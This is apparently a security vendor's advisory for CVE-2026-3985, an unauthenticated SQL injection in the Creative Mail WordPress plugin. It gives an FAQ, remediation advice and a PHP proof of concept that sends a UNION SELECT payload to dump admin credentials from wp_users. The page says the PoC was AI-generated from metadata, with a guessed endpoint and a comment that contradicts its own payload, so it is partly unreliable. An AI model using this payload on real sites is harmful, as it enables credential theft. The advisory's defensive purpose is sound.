What is CVE-2026-3985?

CVE-2026-3985 is a high-severity SQL injection vulnerability found in the Creative Mail plugin for WordPress, affecting versions up to and including 1.6.9. It allows unauthenticated attackers to exploit the ‘checkout_uuid’ parameter to execute arbitrary SQL queries against the database.

How does the SQL injection work?

The vulnerability occurs because the plugin does not properly escape the ‘checkout_uuid’ parameter, allowing attackers to inject malicious SQL code into the query constructed in the has_checkout_consent() method. This can lead to unauthorized access to sensitive data stored in the database.

Who is affected by this vulnerability?

Any WordPress site using the Creative Mail plugin version 1.6.9 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and locate the Creative Mail plugin. If the version is 1.6.9 or lower, your site is vulnerable.

What are the risks associated with this vulnerability?

The risk level is classified as high, with a CVSS score of 7.5. Successful exploitation can allow attackers to extract sensitive information such as user credentials and email addresses from the database without needing authentication.

How can I fix this vulnerability?

To fix this vulnerability, update the Creative Mail plugin to the latest version where the issue has been addressed. Additionally, ensure that the plugin uses parameterized queries with $wpdb->prepare() to prevent SQL injection.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Creative Mail plugin temporarily to prevent exploitation. You may also implement web application firewalls to block malicious requests targeting this vulnerability.

What does the CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity vulnerability, suggesting that it poses a significant risk to systems. It means that exploitation is relatively easy and can lead to serious consequences, such as data breaches.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a specially crafted HTTP request to the WordPress site. It shows how to use an SQL injection payload to extract data from the database.

How can I protect my WordPress site from similar vulnerabilities?

To enhance security, regularly update all plugins and themes, use security plugins to monitor vulnerabilities, and implement best practices such as input validation and parameterized queries in custom code.

What is the 'checkout_uuid' parameter?

The ‘checkout_uuid’ parameter is used in the Creative Mail plugin to manage checkout consent. Its improper handling allows attackers to inject SQL code, leading to potential data breaches.

Is this vulnerability specific to any hosting environments?

No, this vulnerability is not specific to any hosting environment. It affects any WordPress installation using the vulnerable version of the Creative Mail plugin, regardless of the hosting provider.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 19, 2026

CVE-2026-3985: Creative Mail – Easier WordPress & WooCommerce Email Marketing <= 1.6.9 – Unauthenticated SQL Injection via 'checkout_uuid' Parameter (creative-mail-by-constant-contact)

CVE ID CVE-2026-3985

Plugin creative-mail-by-constant-contact

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 1.6.9

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3985 (metadata-based):

This vulnerability allows unauthenticated SQL injection in the Creative Mail plugin for WordPress, affecting versions up to and including 1.6.9. The injection occurs through the ‘checkout_uuid’ parameter processed by the has_checkout_consent() method. The CVSS score of 7.5 with network vector, low attack complexity, and no required privileges indicates a serious threat that any remote attacker can exploit.

Root Cause: Based on the CWE classification and vulnerability description, the plugin fails to properly escape the ‘checkout_uuid’ parameter and does not prepare SQL statements before passing user input to queries. The has_checkout_consent() method likely constructs an SQL query by concatenating the ‘checkout_uuid’ value directly into the query string without using $wpdb->prepare() or similar parameterized query methods. This is a classic SQL injection pattern where the application trusts user-supplied data and inserts it directly into database queries. Atomic Edge analysis infers this from the description, as no source code is available for confirmation.

Exploitation: An unauthenticated attacker can send a crafted HTTP request to a WordPress endpoint that invokes the has_checkout_consent() method. The likely attack vector is an AJAX action or REST endpoint exposed by the Creative Mail plugin. The attacker supplies a malicious value for the ‘checkout_uuid’ parameter containing SQL injection payloads such as UNION-based SELECT statements to extract data from the database. The attack requires no authentication and can be executed over the network.

Remediation: The fix must use parameterized queries with $wpdb->prepare() in the has_checkout_consent() method. The ‘checkout_uuid’ parameter should be escaped using %s placeholder and passed as a separate argument to the prepare() function. Additionally, the plugin should validate the parameter format (expecting a UUID pattern) before using it in database operations. Atomic Edge analysis recommends these standard WordPress security practices.

Impact: Successful exploitation allows an unauthenticated attacker to extract sensitive information from the WordPress database. This includes user credentials, email addresses, session tokens, and any other data stored in the database tables. The high confidentiality impact without authentication requirement makes this vulnerability critical for sites running the vulnerable plugin version.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3985 - Creative Mail – Easier WordPress & WooCommerce Email Marketing <= 1.6.9 - Unauthenticated SQL Injection

// 
// This PoC demonstrates SQL injection via the 'checkout_uuid' parameter.
// Assumes the plugin registers an AJAX hook or REST endpoint that calls has_checkout_consent().
// The exact endpoint is inferred from the vulnerability description (checkout_uuid parameter).
//

<?php

$target_url = 'https://example.com'; // CHANGE THIS to the target WordPress site
$ajax_action = 'creative_mail_checkout_consent'; // Assumed AJAX action name; adjust if different

// SQL injection payload: UNION select to extract admin user credentials
// Uses time-based blind technique to infer data (common for SQLi PoC)
$sql_payload = "' UNION SELECT user_login,user_pass,user_email FROM wp_users WHERE user_login='admin' -- ";

// Build the request URL
$url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php?action=' . $ajax_action . '&checkout_uuid=' . urlencode($sql_payload);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output results
echo "HTTP Response Code: " . $http_code . "n";
echo "Response Body:n";
echo $response . "n";
?>

Frequently Asked Questions

What is CVE-2026-3985?
Overview of the vulnerability
CVE-2026-3985 is a high-severity SQL injection vulnerability found in the Creative Mail plugin for WordPress, affecting versions up to and including 1.6.9. It allows unauthenticated attackers to exploit the ‘checkout_uuid’ parameter to execute arbitrary SQL queries against the database.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability occurs because the plugin does not properly escape the ‘checkout_uuid’ parameter, allowing attackers to inject malicious SQL code into the query constructed in the has_checkout_consent() method. This can lead to unauthorized access to sensitive data stored in the database.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Creative Mail plugin version 1.6.9 or earlier is at risk. Administrators should check their plugin version in the WordPress dashboard and update if necessary.
How can I check if my site is vulnerable?
Steps to verify plugin version
To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and locate the Creative Mail plugin. If the version is 1.6.9 or lower, your site is vulnerable.
What are the risks associated with this vulnerability?
Understanding the impact
The risk level is classified as high, with a CVSS score of 7.5. Successful exploitation can allow attackers to extract sensitive information such as user credentials and email addresses from the database without needing authentication.
How can I fix this vulnerability?
Recommended remediation steps
To fix this vulnerability, update the Creative Mail plugin to the latest version where the issue has been addressed. Additionally, ensure that the plugin uses parameterized queries with $wpdb->prepare() to prevent SQL injection.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the Creative Mail plugin temporarily to prevent exploitation. You may also implement web application firewalls to block malicious requests targeting this vulnerability.
What does the CVSS score of 7.5 indicate?
Interpreting the severity rating
A CVSS score of 7.5 indicates a high severity vulnerability, suggesting that it poses a significant risk to systems. It means that exploitation is relatively easy and can lead to serious consequences, such as data breaches.
What is the proof of concept for this vulnerability?
Demonstration of the issue
The proof of concept demonstrates how an attacker can exploit the vulnerability by sending a specially crafted HTTP request to the WordPress site. It shows how to use an SQL injection payload to extract data from the database.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for security
To enhance security, regularly update all plugins and themes, use security plugins to monitor vulnerabilities, and implement best practices such as input validation and parameterized queries in custom code.
What is the 'checkout_uuid' parameter?
Understanding its role in the vulnerability
The ‘checkout_uuid’ parameter is used in the Creative Mail plugin to manage checkout consent. Its improper handling allows attackers to inject SQL code, leading to potential data breaches.
Is this vulnerability specific to any hosting environments?
Scope of the vulnerability
No, this vulnerability is not specific to any hosting environment. It affects any WordPress installation using the vulnerable version of the Creative Mail plugin, regardless of the hosting provider.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations